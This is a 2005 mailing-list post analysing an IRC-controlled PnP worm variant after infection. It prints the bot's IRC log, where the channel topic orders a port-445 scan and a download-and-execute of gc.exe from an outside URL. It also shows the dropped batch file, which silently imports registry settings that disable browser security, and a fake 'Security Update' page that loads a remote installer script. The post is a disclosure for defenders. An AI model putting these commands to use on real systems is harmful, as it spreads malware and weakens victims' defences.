Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

pnp worm unknown variant - post infection actions

From: "Morning Wood" <se_cur_ity () hotmail com>
Date: Tue, 16 Aug 2005 16:03:32 -0700
pnp worm unknown variant - post infection actions
Donnie Werner
http://exploitlabs.com


[ relevant info ]

[08/16/2005] (out) NICK [00|USA|618452]
[08/16/2005] (out) USER 2K-7566 * 0 :INFECTEDUSER
[08/16/2005] (in)  :hub.de NOTICE [00|USA|618452] :*** If you are having
problems connecting due to ping timeouts, please type /quote pong 5DCA1942
or /raw pong 5DCA1942 now.
[08/16/2005] (in)  PING :5DCA1942
[08/16/2005] (out) PONG 5DCA1942
[08/16/2005] (in)  :hub.de 001 [00|USA|618452] :Welcome to the hub IRC
Network [00|USA|618452]!2K-7566 () 71 xx xx.49

[08/16/2005] (in)  :hub.de 004 [00|USA|618452] hub.de Unreal3.2.1
iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeKVfMGCuzNT

[08/16/2005] (out) MODE [00|USA|618452]
[08/16/2005] (out) JOIN #upnp

[08/16/2005] (in)  :hub.de 332 [00|USA|618452] #upnp :.asc -S -s|.else
status scan .asc PnP445 120 5 0 _a _r _e _s|.if nick *USA* .r JOIN #usa
[08/16/2005] (out) JOIN #usa
[08/16/2005] (out) PRIVMSG #upnp :IRC// Sent IRC raw: "JOIN #usa".

[08/16/2005] (in)  :[00|USA|618452]!2K-7566 () 71 xx xx.49 JOIN :#usa
[08/16/2005] (in)  :hub.de 332 [00|USA|618452] #usa :.down
http://www.dreamcatcherprod.com/gc.exe C:\u487sdjkt.exe 1 -s|.r JOIN #rr
[08/16/2005] (out) JOIN #rr

[ gc.exe ]

gc.exe is a selfextracting archive that expands to..
02/08/2005  05:33 AM             3,496 kans.reg
01/31/2005  06:57 AM             3,276 kansup.reg
07/31/2005  11:06 PM               378 update.html
07/15/2005  05:36 AM                95 x.bat

the .bat runs..
----------
REGEDIT.EXE /S kans.reg
update.html
SLEEP 5
del kans.reg
del x.bat
----------

the .reg files disable IE Security settings

update.html contains...
----------
[TITLE]Security Update[/TITLE]
[HEAD][/HEAD]
[BODY]
[script language='JavaScript' type='text/JavaScript'
src='http://install.xxxtoolbar.com/ist/scripts/prompt.php?retry=2&loadfirst=
1&delayload=0&account_id=159900&recurrence=always&adid=a1117836900&event_typ
e=onload&signature=159900'][/script]
[script language="JavaScript"]self.focus();[/script]
----------

which installs pornographic malware.









_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: